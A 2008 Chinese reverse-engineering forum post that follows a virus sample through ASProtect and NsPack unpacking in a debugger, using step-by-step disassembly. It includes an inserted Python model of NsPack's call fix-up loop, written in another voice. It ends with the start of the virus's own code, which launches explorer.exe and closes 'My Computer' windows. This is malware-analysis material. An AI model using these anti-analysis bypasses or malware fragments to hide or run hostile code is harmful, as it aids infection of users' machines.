[Old post] [Share] Continuing the clumsy-bird unpacking method (unpacked!!!)
Posted: 2008-3-8 09:33
Thanks to lovelyfrog, sskey and 夜凉如水 for their kind help.
Since I have no internet access of my own, I can only get online now and then to post things I wrote beforehand,
so I usually can't reply to thank everyone in the thread;
let me thank the experts all at once here, and this treasure of a place, 看雪, as well.
Thanks again, everyone.
Continuing from last time:
00D8ED08 68 1F8724DD push DD24871F ; broke here using the plugin; only the PEB was hidden
00D8ED0D 68 2C2A0000 push 2A2C
00D8ED12 68 900A0200 push 20A90
00D8ED17 68 C0200000 push 20C0
00D8ED1C 68 44CC0000 push 0CC44
00D8ED21 68 00F00400 push 4F000
00D8ED26 FF35 D434DC00 push dword ptr ds:[DC34D4]
00D8ED2C E8 23D1FFFF call 00D8BE54
00D8ED31 310424 xor dword ptr ss:[esp], eax
00D8ED34 8B05 D434DC00 mov eax, dword ptr ds:[DC34D4]
00D8ED3A 010424 add dword ptr ss:[esp], eax
00D8ED3D C3 retn ; return
00D8ED3E C3 retn
00DC01D8 68 E1288508 push 88528E1 ; land here
00DC01DD 68 E0020000 push 2E0
00DC01E2 68 04590100 push 15904
00DC01E7 68 C4170000 push 17C4
00DC01EC 68 10EA0300 push 3EA10
00DC01F1 68 00F00400 push 4F000
00DC01F6 FF35 D434DC00 push dword ptr ds:[DC34D4]
00DC01FC E8 01000000 call 00DC0202
00DC0201 8183 C404E84A B>add dword ptr ds:[ebx+4AE804C4], E8F>
00DC020B 0100 add dword ptr ds:[eax], eax
00DC020D 0000 add byte ptr ds:[eax], al
00DC020F 8183 C4043104 2>add dword ptr ds:[ebx+43104C4], 1E82>
00DC0219 0000 add byte ptr ds:[eax], al
00DC021B 68 83C4048B push 8B04C483
00DC0220 05 D434DC00 add eax, 0DC34D4
00DC0225 E8 02000000 call 00DC022C
00DC022A E8 6883C404 call 05A08597
00DC022F 010424 add dword ptr ss:[esp], eax
00DC0232 C3 retn ; F4, F8
00DBFADC E8 E7FEFFFF call 00DBF9C8 ; step in
00DBF9C8 53 push ebx ; land here
00DBF9C9 56 push esi
00DBF9CA 57 push edi
00DBF9CB 83C4 DC add esp, -24
00DBF9CE A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBF9D3 C600 DF mov byte ptr ds:[eax], 0DF
00DBF9D6 A1 50B6DC00 mov eax, dword ptr ds:[DCB650]
00DBF9DB 894424 14 mov dword ptr ss:[esp+14], eax
00DBF9DF B8 34E8DB00 mov eax, 0DBE834
00DBF9E4 894424 18 mov dword ptr ss:[esp+18], eax
00DBF9E8 BA C8F9DB00 mov edx, 0DBF9C8
00DBF9ED 2BD0 sub edx, eax
00DBF9EF 895424 1C mov dword ptr ss:[esp+1C], edx
00DBF9F3 B8 40E6DB00 mov eax, 0DBE640
00DBF9F8 8B15 F02BDC00 mov edx, dword ptr ds:[DC2BF0]
00DBF9FE 8B12 mov edx, dword ptr ds:[edx]
00DBFA00 2B02 sub eax, dword ptr ds:[edx]
00DBFA02 894424 20 mov dword ptr ss:[esp+20], eax
00DBFA06 EB 06 jmp short 00DBFA0E
00DBFA08 FF25 C3EB01E8 jmp near dword ptr ds:[E801EBC3]
00DBFA0E 68 A7E8DB00 push 0DBE8A7
00DBFA13 58 pop eax
00DBFA14 40 inc eax
00DBFA15 68 1DFADB00 push 0DBFA1D
00DBFA1A 50 push eax
00DBFA1B ^ EB ED jmp short 00DBFA0A
00DBFA1D E8 1EF4FFFF call 00DBEE40
00DBFA22 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA27 8B00 mov eax, dword ptr ds:[eax]
00DBFA29 8B70 1C mov esi, dword ptr ds:[eax+1C]
00DBFA2C A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA31 8B00 mov eax, dword ptr ds:[eax]
00DBFA33 8B38 mov edi, dword ptr ds:[eax]
00DBFA35 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA3A 8B00 mov eax, dword ptr ds:[eax]
00DBFA3C 8D58 18 lea ebx, dword ptr ds:[eax+18]
00DBFA3F 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA42 75 20 jnz short 00DBFA64
00DBFA44 83C6 20 add esi, 20
00DBFA47 A1 682ADC00 mov eax, dword ptr ds:[DC2A68]
00DBFA4C 80B8 2D010000 0>cmp byte ptr ds:[eax+12D], 0
00DBFA53 75 0F jnz short 00DBFA64
00DBFA55 B8 1F000000 mov eax, 1F
00DBFA5A E8 652EFCFF call 00D828C4
00DBFA5F C1E0 02 shl eax, 2
00DBFA62 2BF0 sub esi, eax
00DBFA64 E8 33EBFFFF call 00DBE59C
00DBFA69 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA6C 74 05 je short 00DBFA73
00DBFA6E A3 8CB6DC00 mov dword ptr ds:[DCB68C], eax
00DBFA73 8B13 mov edx, dword ptr ds:[ebx]
00DBFA75 891424 mov dword ptr ss:[esp], edx
00DBFA78 897424 08 mov dword ptr ss:[esp+8], esi
00DBFA7C 894424 0C mov dword ptr ss:[esp+C], eax
00DBFA80 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFA85 C600 E1 mov byte ptr ds:[eax], 0E1
00DBFA88 A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFA8D E8 EE5DFFFF call 00DB5880
00DBFA92 A1 88B6DC00 mov eax, dword ptr ds:[DCB688]
00DBFA97 894424 04 mov dword ptr ss:[esp+4], eax
00DBFA9B 897C24 10 mov dword ptr ss:[esp+10], edi
00DBFA9F A1 242BDC00 mov eax, dword ptr ds:[DC2B24]
00DBFAA4 8B00 mov eax, dword ptr ds:[eax]
00DBFAA6 E8 6931FCFF call 00D82C14
00DBFAAB A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFAB0 E8 5F31FCFF call 00D82C14
00DBFAB5 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFABA C600 E3 mov byte ptr ds:[eax], 0E3
00DBFABD 8BD4 mov edx, esp
00DBFABF A1 94B6DC00 mov eax, dword ptr ds:[DCB694]
00DBFAC4 E8 23B9FFFF call 00DBB3EC
00DBFAC9 E8 8E3CFFFF call 00DB375C
00DBFACE E8 61EDFFFF call 00DBE834 ; F4, F8, just following along; apparently the three calls are close together
00DBE834 /65:EB 01 jmp short 00DBE838 ; everything turns red from here; Ctrl+F9 to run until return
00DBE837 |C783 D16A13CD B>mov dword ptr ds:[ebx+CD136AD1], 49F>
00DBE841 0003 add byte ptr ds:[ebx], al
00DBE843 4C dec esp
00DBE844 24 18 and al, 18
00DBE846 B9 46624900 mov ecx, 496246
00DBE84B B9 FE224A00 mov ecx, 4A22FE
00DBE850 8D8C22 00000000 lea ecx, dword ptr ds:[edx]
00DBE857 EB 02 jmp short 00DBE85B
00DBE859 CD20 2BCA85C9 vxdjump C985CA2B
00DBE85F 0F85 E7000000 jnz 00DBE94C
00DBE865 C1DA 13 rcr edx, 13
...... (omitted) ......
01F80000 0FB7F7 movzx esi, di ; stops here
01F80003 66:81D2 BD25 adc dx, 25BD
01F80008 E8 07000000 call 01F80014 ; step in
01F80014 0FB7FF movzx edi, di ; from here on it differs from the tutorial; I tried and could only step into every call I saw
01F80017 5B pop ebx
01F80018 BF B0ABA72B mov edi, 2BA7ABB0
01F8001D 81C3 31010000 add ebx, 131
01F80023 68 4FCB957B push 7B95CB4F
01F80028 0F8A 02000000 jpe 01F80030
01F8002E 52 push edx
01F8002F 5A pop edx
01F80030 5E pop esi
01F80031 81DE 0CAB9F6B sbb esi, 6B9FAB0C
01F80037 68 6A76D65A push 5AD6766A
01F8003C 66:BE 379E mov si, 9E37
01F80040 5E pop esi
01F80041 B9 0B000000 mov ecx, 0B
01F80046 0F82 05000000 jb 01F80051
01F8004C BF 3CEFE942 mov edi, 42E9EF3C
01F80051 E8 0F000000 call 01F80065 ; step in
01F80065 68 58468310 push 10834658
01F8006A 66:BF 9CBB mov di, 0BB9C
01F8006E 56 push esi
01F8006F 5F pop edi
01F80070 5F pop edi
01F80071 5E pop esi
01F80072 FF33 push dword ptr ds:[ebx]
01F80074 E8 05000000 call 01F8007E ; step in
01F8007E 50 push eax ; land here
01F8007F 68 CD126831 push 316812CD
01F80084 5E pop esi
01F80085 5F pop edi
01F80086 5A pop edx
01F80087 58 pop eax
01F80088 66:BF A634 mov di, 34A6
01F8008C 81C6 00BC791E add esi, 1E79BC00
01F80092 81F0 77226445 xor eax, 45642277
01F80098 8BF2 mov esi, edx
01F8009A 81F0 E41E2D6D xor eax, 6D2D1EE4
01F800A0 66:8BF7 mov si, di
01F800A3 51 push ecx
01F800A4 0FBFF9 movsx edi, cx
01F800A7 53 push ebx
01F800A8 5F pop edi
01F800A9 5E pop esi
01F800AA 8BD1 mov edx, ecx
01F800AC 81F0 4DCFF703 xor eax, 3F7CF4D
01F800B2 66:81E6 78F5 and si, 0F578
01F800B7 E9 0B000000 jmp 01F800C7 ; jumps down
01F800C7 8903 mov dword ptr ds:[ebx], eax
01F800C9 BA 66F70029 mov edx, 2900F766
01F800CE 83EB 02 sub ebx, 2
01F800D1 4B dec ebx
01F800D2 4B dec ebx
01F800D3 BE BBAE5C5E mov esi, 5E5CAEBB
01F800D8 66:8BF3 mov si, bx
01F800DB 8BF0 mov esi, eax
01F800DD 49 dec ecx
01F800DE ^ 0F85 8EFFFFFF jnz 01F80072 ; jumps up
01F800E4 53 push ebx ; the above is a loop; set a breakpoint here
01F800E5 E8 0E000000 call 01F800F8 ; F7
01F800F8 81CF 0502666D or edi, 6D660205 ; land here
01F800FE E8 10000000 call 01F80113 ; step in
01F80113 5E pop esi ; 01F80103
01F80114 5A pop edx
01F80115 5E pop esi
01F80116 EB 01 jmp short 01F80119 ; jump
01F80119 83CB EF or ebx, FFFFFFEF
01F8011C 035C24 18 add ebx, dword ptr ss:[esp+18]
01F80120 5B pop ebx
01F80121 8D4447 2D lea eax, dword ptr ds:[edi+eax*2+2D]
01F80125 58 pop eax
01F80126 EB 02 jmp short 01F8012A
01F8012A 8D80 9004BE3B lea eax, dword ptr ds:[eax+3BBE0490]
01F80130 03C3 add eax, ebx
01F80132 5C pop esp
01F80133 FFE0 jmp near eax ; calls and jumps all over the place, but luckily it comes out in the end;
Jumped out of aspr.
Then it jumps into another packer, NsPack; first time I've run into it, so I found an example to borrow from.
0041A3D3 9C pushfd ; this is it; at first I thought this was the OEP, and figured it looked
0041A3D4 60 pushad ; a bit odd maybe because it's a virus; I'd assumed unpacking aspr would need the IAT repaired,
0041A3D5 E8 00000000 call 0041A3DA ; never expected the dump to turn out to be yet another packer,
0041A3DA 5D pop ebp
0041A3DB 83ED 07 sub ebp, 7
0041A3DE 8D8D A9FCFFFF lea ecx, dword ptr ss:[ebp-357]
0041A3E4 8039 01 cmp byte ptr ds:[ecx], 1
0041A3E7 0F84 42020000 je 0041A62F
0041A3ED C601 01 mov byte ptr ds:[ecx], 1
0041A3F0 8BC5 mov eax, ebp
0041A3F2 2B85 3DFCFFFF sub eax, dword ptr ss:[ebp-3C3]
0041A3F8 8985 3DFCFFFF mov dword ptr ss:[ebp-3C3], eax
0041A3FE 0185 6DFCFFFF add dword ptr ss:[ebp-393], eax
0041A404 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A40A 0106 add dword ptr ds:[esi], eax
0041A40C 55 push ebp
0041A40D 56 push esi
0041A40E 6A 40 push 40
0041A410 68 00100000 push 1000
0041A415 68 00100000 push 1000
0041A41A 6A 00 push 0
0041A41C FF95 D5FCFFFF call near dword ptr ss:[ebp-32B]
0041A422 85C0 test eax, eax
0041A424 0F84 69030000 je 0041A793
0041A42A 8985 65FCFFFF mov dword ptr ss:[ebp-39B], eax
0041A430 E8 00000000 call 0041A435
0041A435 5B pop ebx
0041A436 B9 67030000 mov ecx, 367
0041A43B 03D9 add ebx, ecx
0041A43D 50 push eax
0041A43E 53 push ebx
0041A43F E8 B0020000 call 0041A6F4
0041A444 5E pop esi
0041A445 5D pop ebp
0041A446 8B36 mov esi, dword ptr ds:[esi]
0041A448 8BFD mov edi, ebp
0041A44A 03BD 2DFCFFFF add edi, dword ptr ss:[ebp-3D3]
0041A450 8BDF mov ebx, edi
0041A452 833F 00 cmp dword ptr ds:[edi], 0
0041A455 75 0A jnz short 0041A461
0041A457 83C7 04 add edi, 4
0041A45A B9 00000000 mov ecx, 0
0041A45F EB 16 jmp short 0041A477
0041A461 B9 01000000 mov ecx, 1
0041A466 033B add edi, dword ptr ds:[ebx]
0041A468 83C3 04 add ebx, 4
0041A46B 833B 00 cmp dword ptr ds:[ebx], 0
0041A46E 74 34 je short 0041A4A4
0041A470 0113 add dword ptr ds:[ebx], edx
0041A472 8B33 mov esi, dword ptr ds:[ebx]
0041A474 037B 04 add edi, dword ptr ds:[ebx+4]
0041A477 57 push edi
0041A478 51 push ecx
0041A479 53 push ebx
0041A47A FFB5 D9FCFFFF push dword ptr ss:[ebp-327]
0041A480 FFB5 D5FCFFFF push dword ptr ss:[ebp-32B]
0041A486 8BD6 mov edx, esi
0041A488 8BCF mov ecx, edi
0041A48A 8B85 65FCFFFF mov eax, dword ptr ss:[ebp-39B]
0041A490 05 AA050000 add eax, 5AA
0041A495 FFD0 call near eax
0041A497 5B pop ebx
0041A498 59 pop ecx
0041A499 5F pop edi
0041A49A 83F9 00 cmp ecx, 0
0041A49D 74 05 je short 0041A4A4
0041A49F 83C3 08 add ebx, 8
0041A4A2 ^ EB C7 jmp short 0041A46B
0041A4A4 68 00800000 push 8000
0041A4A9 6A 00 push 0
0041A4AB FFB5 65FCFFFF push dword ptr ss:[ebp-39B]
0041A4B1 FF95 D9FCFFFF call near dword ptr ss:[ebp-327]
0041A4B7 8DB5 6DFCFFFF lea esi, dword ptr ss:[ebp-393]
0041A4BD 8B4E 08 mov ecx, dword ptr ds:[esi+8]
0041A4C0 8D56 10 lea edx, dword ptr ds:[esi+10]
0041A4C3 8B36 mov esi, dword ptr ds:[esi]
0041A4C5 8BFE mov edi, esi
0041A4C7 83F9 00 cmp ecx, 0
0041A4CA 74 3F je short 0041A50B
0041A4CC 8A07 mov al, byte ptr ds:[edi]
0041A4CE 47 inc edi
0041A4CF 2C E8 sub al, 0E8
0041A4D1 3C 01 cmp al, 1
0041A4D3 ^ 77 F7 ja short 0041A4CC
0041A4D5 8B07 mov eax, dword ptr ds:[edi]
0041A4D7 807A 01 00 cmp byte ptr ds:[edx+1], 0
0041A4DB 74 14 je short 0041A4F1
0041A4DD 8A1A mov bl, byte ptr ds:[edx]
0041A4DF 381F cmp byte ptr ds:[edi], bl
0041A4E1 ^ 75 E9 jnz short 0041A4CC
0041A4E3 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4E6 66:C1E8 08 shr ax, 8
0041A4EA C1C0 10 rol eax, 10
0041A4ED 86C4 xchg ah, al
0041A4EF EB 0A jmp short 0041A4FB
0041A4F1 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4F4 86C4 xchg ah, al
0041A4F6 C1C0 10 rol eax, 10
0041A4F9 86C4 xchg ah, al
0041A4FB 2BC7 sub eax, edi
0041A4FD 03C6 add eax, esi
0041A4FF 8907 mov dword ptr ds:[edi], eax
0041A501 83C7 05 add edi, 5
0041A504 80EB E8 sub bl, 0E8
0041A507 8BC3 mov eax, ebx
0041A509 ^ E2 C6 loopd short 0041A4D1
0041A50B E8 3A010000 call 0041A64A
0041A510 8D8D 81FCFFFF lea ecx, dword ptr ss:[ebp-37F]
0041A516 8B41 08 mov eax, dword ptr ds:[ecx+8]
0041A519 83F8 00 cmp eax, 0
0041A51C 0F84 81000000 je 0041A5A3
0041A522 8BF2 mov esi, edx
0041A524 2B71 10 sub esi, dword ptr ds:[ecx+10]
0041A527 74 7A je short 0041A5A3
0041A529 8971 10 mov dword ptr ds:[ecx+10], esi
0041A52C 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A532 8B36 mov esi, dword ptr ds:[esi]
0041A534 8D5E FC lea ebx, dword ptr ds:[esi-4]
0041A537 8B01 mov eax, dword ptr ds:[ecx]
0041A539 83F8 01 cmp eax, 1
0041A53C 74 0A je short 0041A548
0041A53E 8BFA mov edi, edx
0041A540 0379 08 add edi, dword ptr ds:[ecx+8]
0041A543 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A546 EB 08 jmp short 0041A550
0041A548 8BFE mov edi, esi
0041A54A 0379 08 add edi, dword ptr ds:[ecx+8]
0041A54D 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A550 33C0 xor eax, eax
0041A552 8A07 mov al, byte ptr ds:[edi]
0041A554 47 inc edi
0041A555 0BC0 or eax, eax
0041A557 74 20 je short 0041A579
0041A559 3C EF cmp al, 0EF
0041A55B 77 06 ja short 0041A563
0041A55D 03D8 add ebx, eax
0041A55F 010B add dword ptr ds:[ebx], ecx
0041A561 ^ EB ED jmp short 0041A550
0041A563 24 0F and al, 0F
0041A565 C1E0 10 shl eax, 10
0041A568 66:8B07 mov ax, word ptr ds:[edi]
0041A56B 83C7 02 add edi, 2
0041A56E 0BC0 or eax, eax
0041A570 ^ 75 EB jnz short 0041A55D
0041A572 8B07 mov eax, dword ptr ds:[edi]
0041A574 83C7 04 add edi, 4
0041A577 ^ EB E4 jmp short 0041A55D
0041A579 33DB xor ebx, ebx
0041A57B 87FE xchg esi, edi
0041A57D 8B06 mov eax, dword ptr ds:[esi]
0041A57F 83F8 00 cmp eax, 0
0041A582 74 1F je short 0041A5A3
0041A584 AD lodsd
0041A585 0BC0 or eax, eax
0041A587 74 08 je short 0041A591
0041A589 03D8 add ebx, eax
0041A58B 66:010C1F add word ptr ds:[edi+ebx], cx
0041A58F ^ EB F3 jmp short 0041A584
0041A591 33DB xor ebx, ebx
0041A593 C1E9 10 shr ecx, 10
0041A596 AD lodsd
0041A597 0BC0 or eax, eax
0041A599 74 08 je short 0041A5A3
0041A59B 03D8 add ebx, eax
0041A59D 66:010C1F add word ptr ds:[edi+ebx], cx
0041A5A1 ^ EB F3 jmp short 0041A596
0041A5A3 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A5A9 8B16 mov edx, dword ptr ds:[esi]
0041A5AB 8DB5 99FCFFFF lea esi, dword ptr ss:[ebp-367]
0041A5B1 8A06 mov al, byte ptr ds:[esi]
0041A5B3 3C 01 cmp al, 1
0041A5B5 75 3F jnz short 0041A5F6
0041A5B7 0356 04 add edx, dword ptr ds:[esi+4]
0041A5BA 56 push esi
0041A5BB 52 push edx
0041A5BC 56 push esi
0041A5BD 6A 04 push 4
0041A5BF 68 00010000 push 100
0041A5C4 52 push edx
0041A5C5 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5CB 5F pop edi
0041A5CC 5E pop esi
0041A5CD 83F8 01 cmp eax, 1
0041A5D0 0F85 BD010000 jnz 0041A793
0041A5D6 83C6 08 add esi, 8
0041A5D9 B9 08000000 mov ecx, 8
0041A5DE F3:A4 rep movsb
0041A5E0 83EE 0C sub esi, 0C
0041A5E3 83EF 08 sub edi, 8
0041A5E6 56 push esi
0041A5E7 FF76 FC push dword ptr ds:[esi-4]
0041A5EA 68 00010000 push 100
0041A5EF 57 push edi
0041A5F0 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5F6 55 push ebp
0041A5F7 5B pop ebx
0041A5F8 81EB 15000000 sub ebx, 15
0041A5FE 33C9 xor ecx, ecx
0041A600 8A0B mov cl, byte ptr ds:[ebx]
0041A602 80F9 00 cmp cl, 0
0041A605 74 28 je short 0041A62F
0041A607 43 inc ebx
0041A608 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A60E 8B16 mov edx, dword ptr ds:[esi]
0041A610 56 push esi
0041A611 51 push ecx
0041A612 53 push ebx
0041A613 52 push edx
0041A614 56 push esi
0041A615 FF33 push dword ptr ds:[ebx]
0041A617 FF73 04 push dword ptr ds:[ebx+4]
0041A61A 8B43 08 mov eax, dword ptr ds:[ebx+8]
0041A61D 03C2 add eax, edx
0041A61F 50 push eax
0041A620 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A626 5A pop edx
0041A627 5B pop ebx
0041A628 59 pop ecx
0041A629 5E pop esi
0041A62A 83C3 0C add ebx, 0C
0041A62D ^ E2 E1 loopd short 0041A610
0041A62F B8 00000000 mov eax, 0
0041A634 83F8 00 cmp eax, 0
0041A637 74 0A je short 0041A643
0041A639 61 popad
0041A63A 9D popfd
0041A63B B8 01000000 mov eax, 1
0041A640 C2 0C00 retn 0C
0041A643 61 popad
0041A644 9D popfd
0041A645 - E9 DE4CFFFF jmp 0040F328
The second packer isn't like the example I borrowed from: just F8 all the way and it jumps to the OEP.
I dumped this one directly as well; I didn't dare run it, just loaded it straight into OD, so I don't know whether it needs repairing.
Looking at the program, it seems not to.
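The loop at 0041A4C7-0041A509 in the NsPack stub above restores the rel32 displacements of call/jmp instructions that the packer had stored as big-endian, section-relative values (a common trick to make code compress better). As an added example, not code from this post or from NsPack, here is a Python model of that loop together with the inverse transform I derived from it to build test input; the marker handling, the `count` argument and the constructed byte sample are my reading of the stub, not anything the post states.

```python
"""Model of the NsPack E8/E9 fix-up loop (0041A4C7-0041A509 in the listing).

Mapping from the listing to this code (my reading of the stub):
  edi      -> scan position in the unpacked section (`pos` below)
  esi      -> section base; cancels out once we work on buffer offsets
  ecx      -> number of transformed sites still to restore (loaded from [esi+8])
  [edx]    -> marker byte, used only when [edx+1] != 0
For every E8 (call) / E9 (jmp) opcode the stub reads the operand big-endian
(3 bytes after the marker, or all 4 bytes when no marker is in use), computes
value - edi + esi and writes the result back little-endian as a normal rel32.
"""
from typing import Optional, Tuple

CALL, JMP = 0xE8, 0xE9
MASK32 = 0xFFFFFFFF


def decode_nspack_call_fixups(data: bytes, count: int,
                              marker: Optional[int] = None) -> bytes:
    """Restore `count` transformed call/jmp sites in `data` (the unpacked section)."""
    buf = bytearray(data)
    pos = 0
    remaining = count                 # ecx: decremented once per restored site (loopd)
    while remaining and pos < len(buf):
        op = buf[pos]
        pos += 1                      # mov al,[edi] / inc edi
        if op not in (CALL, JMP):     # sub al,0E8 / cmp al,1 / ja -> keep scanning
            continue
        if pos + 4 > len(buf):        # the stub has no bound check; we stop cleanly
            break
        if marker is not None:
            if buf[pos] != marker:    # cmp byte [edi],bl / jnz -> keep scanning
                continue
            # shr ax,8 / rol eax,10 / xchg ah,al == big-endian 3 bytes after the marker
            stored = int.from_bytes(buf[pos + 1:pos + 4], "big")
        else:
            # xchg ah,al / rol eax,10 / xchg ah,al == big-endian 4 bytes
            stored = int.from_bytes(buf[pos:pos + 4], "big")
        rel = (stored - pos) & MASK32           # sub eax,edi / add eax,esi (esi cancels)
        buf[pos:pos + 4] = rel.to_bytes(4, "little")   # mov [edi],eax
        pos += 4                                # add edi,5 (opcode byte already consumed)
        remaining -= 1
    return bytes(buf)


def encode_nspack_call_fixups(data: bytes,
                              marker: Optional[int] = None) -> Tuple[bytes, int]:
    """Assumed inverse (what the packer does before compressing), derived from the
    stub's loop; used here to build test input. Returns (transformed, site count)."""
    buf = bytearray(data)
    pos, count = 0, 0
    while pos < len(buf):
        op = buf[pos]
        pos += 1
        if op not in (CALL, JMP) or pos + 4 > len(buf):
            continue
        rel = int.from_bytes(buf[pos:pos + 4], "little")
        stored = (rel + pos) & MASK32
        if marker is not None:
            if stored >> 24:
                raise ValueError(f"site at {pos:#x} does not fit the 3-byte marker form")
            buf[pos] = marker
            buf[pos + 1:pos + 4] = stored.to_bytes(3, "big")
        else:
            buf[pos:pos + 4] = stored.to_bytes(4, "big")
        pos += 4
        count += 1
    return bytes(buf), count


# Constructed sample (not from the post): nop; call +0x10; nop; jmp -4; ret
SAMPLE = bytes([0x90, 0xE8, 0x10, 0x00, 0x00, 0x00,
                0x90, 0xE9, 0xFC, 0xFF, 0xFF, 0xFF, 0xC3])


def roundtrip(marker: Optional[int] = None) -> bool:
    """True when decode(encode(SAMPLE)) reproduces SAMPLE exactly."""
    packed, sites = encode_nspack_call_fixups(SAMPLE, marker)
    return decode_nspack_call_fixups(packed, sites, marker) == SAMPLE


if __name__ == "__main__":
    packed, sites = encode_nspack_call_fixups(SAMPLE)
    print(f"{sites} sites, packed: {packed.hex()}")
    print("roundtrip ok:", roundtrip(), roundtrip(marker=0xAA))
```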
After much hardship I finally found it. OEP, you were truly not easy to find.
Below is the virus code itself; I'm posting it first to show it off, I haven't started tracing it yet. Today I also discovered the benefit of a virtual machine: when I don't feel like tracing any more, I can save the current state.
PEiD identifies it as Delphi.
0040F328 >/$ 55 push ebp
0040F329 |. 8BEC mov ebp, esp
0040F32B |. B9 32000000 mov ecx, 32
0040F330 |> 6A 00 /push 0
0040F332 |. 6A 00 |push 0
0040F334 |. 49 |dec ecx
0040F335 |.^ 75 F9 \jnz short 0040F330
0040F337 |. 51 push ecx
0040F338 |. 53 push ebx
0040F339 |. 56 push esi
0040F33A |. 57 push edi
0040F33B |. B8 C0F24000 mov eax, 0040F2C0
0040F340 |. E8 1352FFFF call 00404558
0040F345 |. 8B3D 58144100 mov edi, dword ptr ds:[411458] ; 1.004113D8
0040F34B |. 33C0 xor eax, eax
0040F34D |. 55 push ebp
0040F34E |. 68 1E034100 push 0041031E
0040F353 |. 64:FF30 push dword ptr fs:[eax]
0040F356 |. 64:8920 mov dword ptr fs:[eax], esp
0040F359 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F35E |. BA 04010000 mov edx, 104
0040F363 |. E8 584CFFFF call 00403FC0
0040F368 |. 68 04010000 push 104
0040F36D |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F372 |. 8B00 mov eax, dword ptr ds:[eax]
0040F374 |. E8 1F4BFFFF call 00403E98
0040F379 |. 50 push eax ; |PathBuffer
0040F37A |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040F37F |. 50 push eax ; |hModule => NULL
0040F380 |. E8 9753FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040F385 |. 8BD0 mov edx, eax
0040F387 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F38C |. E8 2F4CFFFF call 00403FC0
0040F391 |. E8 B28FFFFF call 00408348
0040F396 |. BE 17000000 mov esi, 17
0040F39B |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040F3A1 |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040F3A6 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040F3A8 |. E8 BB47FFFF |call 00403B68
0040F3AD |. 8D55 EC |lea edx, dword ptr ss:[ebp-14]
0040F3B0 |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040F3B5 |. 8B00 |mov eax, dword ptr ds:[eax]
0040F3B7 |. E8 4470FFFF |call 00406400
0040F3BC |. 8B45 EC |mov eax, dword ptr ss:[ebp-14]
0040F3BF |. 50 |push eax
0040F3C0 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F3C5 |. FF30 |push dword ptr ds:[eax]
0040F3C7 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F3CC |. FF30 |push dword ptr ds:[eax]
0040F3CE |. FF37 |push dword ptr ds:[edi]
0040F3D0 |. 8D45 E4 |lea eax, dword ptr ss:[ebp-1C]
0040F3D3 |. BA 03000000 |mov edx, 3
0040F3D8 |. E8 7B49FFFF |call 00403D58
0040F3DD |. 8B45 E4 |mov eax, dword ptr ss:[ebp-1C]
0040F3E0 |. 8D55 E8 |lea edx, dword ptr ss:[ebp-18]
0040F3E3 |. E8 1870FFFF |call 00406400
0040F3E8 |. 8B55 E8 |mov edx, dword ptr ss:[ebp-18]
0040F3EB |. 58 |pop eax
0040F3EC |. E8 F349FFFF |call 00403DE4
0040F3F1 |. 0F85 A5010000 |jnz 0040F59C
0040F3F7 |. 6A 01 |push 1
0040F3F9 |. 8D45 DC |lea eax, dword ptr ss:[ebp-24]
0040F3FC |. E8 D384FFFF |call 004078D4
0040F401 |. FF75 DC |push dword ptr ss:[ebp-24]
0040F404 |. 68 38034100 |push 00410338 ; ASCII "explorer.exe "
0040F409 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F40E |. FF30 |push dword ptr ds:[eax]
0040F410 |. 8D45 E0 |lea eax, dword ptr ss:[ebp-20]
0040F413 |. BA 03000000 |mov edx, 3
0040F418 |. E8 3B49FFFF |call 00403D58
0040F41D |. 8B45 E0 |mov eax, dword ptr ss:[ebp-20]
0040F420 |. E8 734AFFFF |call 00403E98
0040F425 |. 50 |push eax ; |CmdLine
0040F426 |. E8 7953FFFF |call <jmp.&kernel32.WinExec> ; \WinExec
0040F42B |. 6A 00 |push 0 ; /lParam = 0
0040F42D |. 6A 00 |push 0 ; |wParam = 0
0040F42F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F431 |. 68 48034100 |push 00410348 ; |/Title = "我的电脑"
0040F436 |. 6A 00 |push 0 ; ||Class = 0
0040F438 |. E8 8753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F43D |. 50 |push eax ; |hWnd
0040F43E |. E8 C953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F443 |. 6A 00 |push 0 ; /lParam = 0
0040F445 |. 6A 00 |push 0 ; |wParam = 0
0040F447 |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F449 |. 68 54034100 |push 00410354 ; |/Title = "我的電腦"
0040F44E |. 6A 00 |push 0 ; ||Class = 0
0040F450 |. E8 6F53FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F455 |. 50 |push eax ; |hWnd
0040F456 |. E8 B153FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
